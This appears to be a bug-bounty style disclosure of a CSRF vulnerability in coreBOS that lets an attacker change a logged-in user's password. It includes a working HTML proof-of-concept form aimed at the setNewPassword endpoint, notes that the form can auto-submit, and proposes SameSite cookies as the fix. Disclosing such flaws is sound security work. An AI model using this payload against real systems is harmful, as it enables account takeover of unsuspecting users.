✍️ Description

Attacker able to change password with CSRF attack because there is any CSRF protection for related endpoint.

It does not matter at all that your application run in localhost or elsewhere, just it is enough to run on a browser and another low privilege user or attackers know the IP address or hostname of your application.

In CSRF attacks it is necessary that a user logged into your application just going to a malicious website and after that only with a redirection attacker can change password, this means only with visiting a site your password will be changed.

🕵️‍♂️ Proof of Concept

1.fisrt user already should be logged in browser.

2.Open the PoC.html and click on submit button ( Also it can be auto-submit)

3.Here password have been changed to xZKKPS3fkn8o after clicking on submit button on PoC.html file.

// PoC.html

<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://demo.corebos.com/index.php">
<input type="hidden" name="module" value="Utilities" />
<input type="hidden" name="action" value="UtilitiesAjax" />
<input type="hidden" name="file" value="ExecuteFunctions" />
<input type="hidden" name="functiontocall" value="setNewPassword" />
<input type="hidden" name="&#95;&#95;vt5rftk" value="" />
<input type="hidden" name="record" value="1" />
<input type="hidden" name="new&#95;password" value="xZKKPS3fkn8o" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

Also for real attacks the submit button can be auto-submit.

💥 Impact

This vulnerability is capable of take control of any account.

Fix

set SameSite attribute of cookies to Strict. 📍 Location index.php#L1